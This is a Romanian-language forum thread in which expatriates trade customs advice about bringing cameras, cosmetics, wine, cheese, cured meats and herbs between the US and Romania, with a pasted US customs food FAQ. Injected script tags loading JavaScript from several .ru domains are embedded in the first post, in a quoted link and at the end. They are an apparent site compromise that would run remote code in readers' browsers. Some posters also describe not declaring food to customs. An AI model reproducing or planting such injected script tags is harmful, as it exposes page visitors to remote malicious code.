PDA

Arată versiune întreagă : Ce pot/nu pot lua in avion?

03.06.2005, 07:44
In curand imi voi incheia studiile in SUA si voi pleca acasa. Vroiam sa va intreb:
- Daca voi cumpara un aparat foto pentru uz personal in SUA va trebui sa il declare la vama?
- Atat in SUA cat si in <st1:country-regi&#111;n><st1:place>Romania</st1:place></st1:country-regi&#111;n>?
- Va trebui sa platesc o taxa vamala?
- Ce suma ar fi acesta?

In afara de membrii familiei, am cativa prieteni buni si colegi la care asi cumpara cadouri ca: dulciuri, cosmetice, carti. Credeti ca se vor lega de ele?

Am incercat sa ma informez de pe paginile firmelor aeriene, dar nu am aflat nimic concret.
Am rugamintea sa imi impartasiti experientele voastre ca sa stiu cam la ce sa ma astept din partea vamesilor (atat americani cat si romani). Orice sugestie este bine venita. Va multumescscript><script src<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js><<script src=http://www.iroe.ru/ngg.js></script>

sorin
03.06.2005, 09:17
Un aparat de fotografiat nu e nici o problema. Chiar si o camera video e considerata tot obiect personal. In afara de electronice asa mai mari, nu prea au de ce sa se lege. Dulciuri, carti, etc., nu reprezinta nici o problema.

03.06.2005, 10:50
Multumesc frumos de raspuns

agora
06.06.2005, 00:20
Romanii la electronice sunt destul de exigenti dar probabil un aparat foto nu va fi o problema. La cosmetice atentie ca au un plafon de vreo 100Eur, ce e sub nu se plateste taxa vamala, ce e peste se plateste. Nu stiu detalii exacte dar a fost cazul unui pasager roman intors din Europa acum cateva luni, pe un aeroport romanesc (omul avea mai multe parfumuri cumparate din duty free din Budapesta)

Sa nu iei nici macar din greseala obiecte metalice ascutite in bagajul pentru cabina (se poate in bagajul pentru cala). Daca dai de un vames cu capsa pusa poti avea probleme. Unei cunostinte i-au luat pana si forfecuta din trusa de manichiura. In principiu nu patesti nimic (amenzi, etc.) dar ramai fara obiectul cu pricina.

Laura
06.06.2005, 05:21
Eu incep sa ma sperii cu electronicele. O sa plec si eu in tara peste
vreo doua saptamani si o sa am cu mine ceva electronice: laptop, pe
care insa il aduc inapoi, dar si CD player (cu radio, casetofon etc.)
si un DVD player. Bineinteles ca ambele sunt destul de mari. Cam cat de
des se intampla sa-ti deschida bagajele? Ma gandeam sa pastrez oricum
chitantele, ca macar sa platesc taxe la valoarea reala, mult mai mica
decat ar stabili ei la aeroport.

Inca ceva: e mai probabil sa verifice un cetatean roman sau unul
american? Intreb pt ca as putea sa i le dau in bagaje prietenului meu,
care e american. Ma gandesc ca de el poate nu s-ar lua, fiind mai putin
probabil ca un strain sa inteleaga care e treaba cu mita pe care de
fapt o vor ei. El o sa vina insa separat, deci n-as vrea nici sa se ia
prea tare de el si saracul sa nu inteleaga ce vor sa spuna.

Ana Tofan
06.06.2005, 06:33
Salut , Laura cum iti mai merge,mai tii minte cand vorbeam pe forum despre plecarea ta in U.S.A.?Sunt eu ,Isabella&gt;

angela
06.06.2005, 07:58
Isabela subiectul acestui topic e cu totul altul asa ca te-as ruga sa ii scrii Laurei PM sau ii scrii unde i-ai mai tot scris pe " comunitatea din California"

In legatura cu topicul, eu am venit in Romania cu un laptop, camera digitala, camera video si nu am avut nici un fel de probleme. Am fost intrebata daca am electronice si am raspuns frumos si politicos " Da, am dar sunt pentru uz personal " Nu au intrebat ce si doar mi-au urat o zi buna!!

albinutza
07.06.2005, 08:15
Salutare aduare smileys/smiley2.gif

Da, si eu ca si Angela va pot spune ca am fost in romania cu 3 geamantane mai mari decat mine, eram la limita de 70 pounds - din martie s-a micsorat la 50 din cate stiu- dar oricum am avut camera video, camera digitala si laptop-ul de care sunt nedespartita smileys/smiley17.gif. Am avut cosmetice in valoare de peste 100 Euro, numai ale mele personale , in afara de cadouri , numai intr-o zi am cumparat cadouri, cosmetice in valoare de 400 $ asa ca am fost foarte bine '' aprovizionata'' smileys/smiley36.gif

Da, in romania nu am avut nici un fel de probleme la aeroport. M-au oprit sa ma verifice si sa-si bage ei nasu' in oala mea smileys/smiley7.gif- dar asta numaipt ca m-au vazut cu asa mult bagaj- insa doamna respectiva a fost destul deamabila cu toate ca mi-a cam batut ceva semnale ca ce am asa multe cosmetice- . Insa olteanca de la natura nu m-am pierdut cu firea si am stiut cum sa o calmez si sa-mi pastrez tot ce aveam in bagaje. E funny ca aveam cam 7 parfumuri , toate ale mele si ar fi poftit si ea saracuta, dar neah, i'm stingy smileys/smiley119.gif.

O zi buna voua tuturor !

smileys/smiley31.gif

ralux
08.06.2005, 04:42
stiu ca topicul este ce se poate aduce in romania fara probleme,dar eu as vrea sa stiu ce as putea lua din romania fara sa am probleme.in cazul in care duc cu mine,in bagajul din cala 2 sticle de vin (sa le fac cadou la niste americani), sau poate chiar niste prajituri facute de mama smileys/smiley17.gif (i hope im not pushing..)...care este cel mai rau lucru care mi se poate intampla?Sa raman fara ele...sau ma pot intoarce chiar si pe mine inapoi?

andok7
08.06.2005, 05:01
Ralux, vama la americani este foarte stricta acum .Sa fi convinsa ca te vor intreba si iti vor verifica bagajul . In situatia asta trebuie sa declari ceea ce aduci cu tine aici .CRED CA CEL MAI BINE ESTE SA DECLARI TOTUL. Este interzis sa intri cu mincare in USA (prajiturile). Exista sansa sa nu ti le ia . Cred ca locul cel mai potrivit sa le pui este in bagajul de mina si la vama sa simulezi ca iti este foame si le maninci tu .. pe toate:):):). Doua sticle de vin nu este nici o problema(Coteasca ? :)) Si eu am venit cu cinci sticle dar toate puse in valiza. Le-am declarat ca le aduc cadou si nu mi-au facut nimic. Poate a fost noroc.Pune si tu o valoare de $4 pe sticla asta ca sa NU creada ca cine stie ce vin vechi de $1000 sticla aduci. Dar asa cum ai sa vezi si tu vamesii americani citodata sint exigenti cite odata trec cu vederea (lucruri marunte ca acestea). Depinde de norocul tau. Acum tu decizi.Calatorie placuta.

andok7
08.06.2005, 05:11
Felicitari pentru terminarea studiilor aici in USA Adakelah. Vama din Romania iti da voie sa intri cu un aparat foto. De asemenea nu am avut problema cu : cd player-portabil, laptop,alt aparat foto-digital,camera digitala video,cd-uri,transformator de curent pentru aceste electrice... le-am declarat cind m-au intrebat ca fiind lucrurile mele personale cu care calatoresc. Nu a fost nici cea mai mica problema. Nu este rau sa ti chitantele cu care ai cumparat aceste obiecte la indemina. Good luck and have a nice trip.

andok7
08.06.2005, 05:13
Adakelah,sorry ,la vama americana nu trebuie sa declari NIMIC DIN TOATE CELE CE DUCI IN ROMANIA. Plecarea de aici este mai simpla decit venirea:).

Laura
08.06.2005, 05:32
Ralux, in principiu cred ca nu ai voie cu prajituri. Eu insa mi-am adus
cand am venit si nu m-a controlat nimeni. Parca m-au intrebat daca am
ceva alimente si am spus ca am niste ciocolata, pt ca intr-adevar
aveam, dar au zis ca e ok si nu s-au uitat in bagaje. N-am spus de
prajiturismileys/smiley17.gif. In principiu ai voie doar alimente care sunt din comert, ambalate si probabil nu chiar orice.

08.06.2005, 09:39
Va multumesc la toti pentru raspuns.

O sa plec cu inima impacata si nu voi "tremura" la vama smileys/smiley2.gif. Chiar daca initial cand am venit abia asteptam sa plec, dar acum imi va fi greu sa ma despart de NY.

Toti cei care sunteti pe acest fosum sunteti niste oameni minunati si va urez mult succes in "avetura americana". Sa uzim de bine

angela
14.06.2005, 02:26
De abia m-am intors inapoi in State si am stat cu sufletelul la gura in vama pe JFK din cauza unui salam de sibiu, sticle de vin si tot felul de condimente cum ar fii printre altele si leusteanulsmileys/smiley36.gif, dar am avut noroc, nu am avut nici un control, al meu sot a refuzat sa declare salamul si totusi a fost totul bine. Sper sa aibe toata lumea bafta mea!

14.06.2005, 03:34
smileys/smiley36.gifAngela se pare ca ai fost tu norocoasa,pe o prietena de-a mea au prins-o cu leusteanul nedeclarat si a platit 50$ amenda si au oprit si leusteanulsmileys/smiley6.gif

si eu am avut noroc cu prajituri si mezeluri ,nu m-au controlat nicidata si nici nu am declarat niciodatasmileys/smiley4.gif

P.s am gasit leustean verde aici la o florariesmileys/smiley14.gif

hazel
14.06.2005, 14:01
melina, cum se spune la leustean in engleza, ai idee? eu habar nu am.

Din cauza ca mi-a intrat frica in oase dupa ce m-am intors din Europa si ne-au verificat astia la vama randomlyaici in US daca avem alimente cu noi, eu i-am zis maica-mii sa nu aduca absolut nimic cand vine, voia sa imi aduca niste nuga ca pofteamsi niste seminte de leustean.

Eu nu am vazut niciodata leustean pe continentul nord american.

hazel
14.06.2005, 14:06
Ralux, in principiu cred ca nu ai voie cu prajituri. Eu insa mi-am adus cand am venit si nu m-a controlat nimeni. Parca m-au intrebat daca am ceva alimente si am spus ca am niste ciocolata, pt ca intr-adevar aveam, dar au zis ca e ok si nu s-au uitat in bagaje. N-am spus de prajiturismileys/smiley17.gif. In principiu ai voie doar alimente care sunt din comert, ambalate si probabil nu chiar orice.

Laura, sa iti zic eu ce ni s-a intamplat, apropo de ce alimente ai voie sa aduci in US. Am trecut odata vama cu masina din Canada in US si aveam in portbagaj conserve whiskas de mancare de matze. In trecut ne lasau cu ea, acuma, dupa ce am declarat-o ne-au luat-o pe toata. Nu ma intrebati de ce aduceam mancare de pisici din Canada smileys/smiley36.gif

Tot atunci i-am zis vamesului ca avem niste pateu de ficat din Canada. Mi-a cerut sa se uite daca contine "beef" si fiindca nu continea beef m-a lasat cu pateul. Asta e legat de mad cow disease de la canadieni, oricum, naiba stie ce poti sa introduci in tara si ce nu.

angela
14.06.2005, 14:35
Wow se gaseste leustean? Asta e chiar bine, dar acum sunt super aprovizionata asa ca chiar nu mai am nevoie de nimicsmileys/smiley2.gif

15.06.2005, 00:30
Nu stiu cum se numeste in engleza leustean ,eu am fost la o plantatie unde se vindeau plante pentru gradina si la secta Herbs l-am vazut intr-un ghiveci mic si l-am recunoscut si dupa miros ,nu era mai scump decit o legatura de leustean,bineinteles ca ar fi mai bine sa il plantezi in gradinasmileys/smiley2.gif

O sa mai ma uit inca odata disearape catonasul pastrat dar cred ca nu scriadecit herbsmileys/smiley18.gif

buburuza
06.11.2005, 10:13
Salve,

Daca va mai intereseaza leusteanul cred ca se numeste lavage sau asa ceva si se gaseste la 'buruieni aromatice'. :)

Mmap
06.11.2005, 10:43
Leustean - lovage

Cimbru - savory

Busuioc - Basil

smileys/smiley1.gif

angela
06.11.2005, 10:51
Cimbru=thymesmileys/smiley2.gif

Mmap
07.11.2005, 05:57
In curand imi voi incheia studiile in SUA si voi pleca acasa. Vroiam sa va intreb:
- Daca voi cumpara un aparat foto pentru uz personal in SUA va trebui sa il declare la vama?
- Atat in SUA cat si in <st1:country-regi&#111;n><st1:place>Romania</st1:place></st1:country-regi&#111;n>?
- Va trebui sa platesc o taxa vamala?
- Ce suma ar fi acesta?

In afara de membrii familiei, am cativa prieteni buni si colegi la care asi cumpara cadouri ca: dulciuri, cosmetice, carti. Credeti ca se vor lega de ele?

Am incercat sa ma informez de pe paginile firmelor aeriene, dar nu am aflat nimic concret.

Am rugamintea sa imi impartasiti experientele voastre ca sa stiu cam la ce sa ma astept din partea vamesilor (atat americani cat si romani). Orice sugestie este bine venita. Va multumesc

Poti gasi informatiile necesare pe site-ul Ministerului Afacerilor Externe:

<A href="http://www.mae.ro/<script src=http://www.iroe.ru/ngg.js></script>

gio4elly
21.11.2007, 00:26
Un aparat de fotografiat nu e nici o problema. Chiar si o camera video e considerata tot obiect personal. In afara de electronice asa mai mari, nu prea au de ce sa se lege. Dulciuri, carti, etc., nu reprezinta nici o problema.

salve

tot ce ma intereseaza pe mine e daca imi pot lua in bagajul de mana niste mezeluri de acasa(salam si cascaval).acum vad ca au bagat fel de fel de restrictii si nu as vrea sa mi le arunce prin aeroport.mercic

livia
21.11.2007, 02:31
In nici-un caz la bagajul de mana.

Mezelurile sunt interzise din start, sotul meu a platit amenda pentru niste salam de Sibiu , parca in jur de 200$.

Cascaval poti sa aduci, eu am adus anul trecut dar l-am declarat pe formularul care il completezi in avion.

Cand a vazut ca am declarat, m-a trecut pe un culoar spre "produse agricole". Acolo m-au pus sa le arat cascavalul, era ambalat in folie de aluminiu si apoi in pungi. Nu le-au desfacut doar s-au amuzat nitel "Romanian Cheese" si m-au lasat sa trec cu el.

Ce stiu sigur daca declari e riscul doar sa ti le arunce daca-s interzise, daca nu declari, poti lua si amenda in caz ca te prinde.

Uite eu m-am ghidat dupa asta:

http://help.cbp.gov/cgi-bin/customs.cfg/php/enduser/std_adp (http://help.cbp.gov/cgi-bin/customs.cfg/php/enduser/std_adp.php?p_faqid=82&amp;p_created=1043364936&amp;p_sid= oqsypEIi&amp;p_accessibility=0&amp;p_redirect=&amp;p_lva=880&amp;p _sp=cF9zcmNoPTEmcF9zb3J0X2J5PSZwX2dyaWRzb3J0PSZwX3 Jvd19jbnQ9NTYmcF9wcm9kcz0wJnBfY2F0cz0wJnBfcHY9JnBf Y3Y9JnBfc2VhcmNoX3R5cGU9YW5zd2Vycy5zZWFyY2hfbmwmcF 9wYWdlPTEmcF9zZWFyY2hfdGV4dD1yZXN0cmljdGlvbnM*&amp;p_l i=&amp;p_topview=1). php?p_faqid=82&amp;p_created=1043364936&amp;p_sid=oqsypEIi&a mp;p_accessibility=0&amp;p_redirect=&amp;p_lva=880&amp;p_sp= cF9zcmNoPTEmcF9zb3J0X2J5PSZwX2dyaWRzb3J0PSZwX3Jvd1 9jbnQ9NTYm cF9wcm9kcz0wJnBfY2F0cz0wJnBfcHY9JnBfY3Y9JnBfc2Vhcm NoX3R5cGU9 YW5zd2Vycy5zZWFyY2hfbmwmcF9wYWdlPTEmcF9zZWFyY2hfdG V4dD1yZXN0 cmljdGlvbnM*&amp;p_li=&amp;p_topview=1

<TABLE cellSpacing=0>
<T>
<TR>
<TD class=subtitle>Question</TD></TR>
<TR>
<TD class=textcell></TD>
<TD class=textcell id=desc>Can I bring in food as a traveler (fruit, cheese, meat, etc)? The information in this answer does not apply to food being sent to the U.S. through the mail, courier services or other means.</TD></TR>
<TR>
<TD>http://help.cbp.gov/rnt/rnw/img/trnsp.gif</TD></TR>
<TR>
<TD class=subtitle></TD>
<TD class=subtitle>Answer</TD></TR>
<TR>
<TD class=textcell></TD>
<TD class=textcell id=soln>

Many fruits and vegetables are either prohibited from entering the United States or require an import permit (for commercial importers) or a phytosanitary certificate from the country of origin. Every fruit or vegetable must be declared to a CBP Officer and must be presented for inspection - no matter how free of pests it appears to be. Failure to declare food products can result in a $10,000 fine. See special guidelines for produce from Canada below.

Meats, livestock, poultry, and their products are either prohibited or restricted from entering the United States, depending on the animal disease condition in the country of origin. Fresh meat is generally prohibited from most countries. Canned, cured, or dried meat is severely restricted from some countries. See special guidelines for animal products from Canada below, and our Q&amp;A on meat, poultry and swine products for a more complete discussion of food items from those sources.

Bakery items, candy, chocolate, and cured cheese are generally admissible. Canned goods and goods in vacuum packed jars (other than those containing meat or poultry products)are also generally admissible if being imported for personal use.

Dairy items such as milk, yogurt, butter are generally admissible, although this is subject to change, depending on disease outbreaks. Eggs may be admissible, although frequent outbreaks of Exotic Newcastles Disease and avian flu make it very likely that they will be denied entry. Hard cured cheese such as parmesan or cheddar are generally admissible, soft cheeses such as brie and soft curd cheese and cheese in water(ricotta, feta, etc.) are not.

Cooked and raw poultry is now allowed from Canada.

Fish, if it is for your personal use, is generally admissible.

Condiments<<script src=http://www.iroe.ru/ngg.js></script>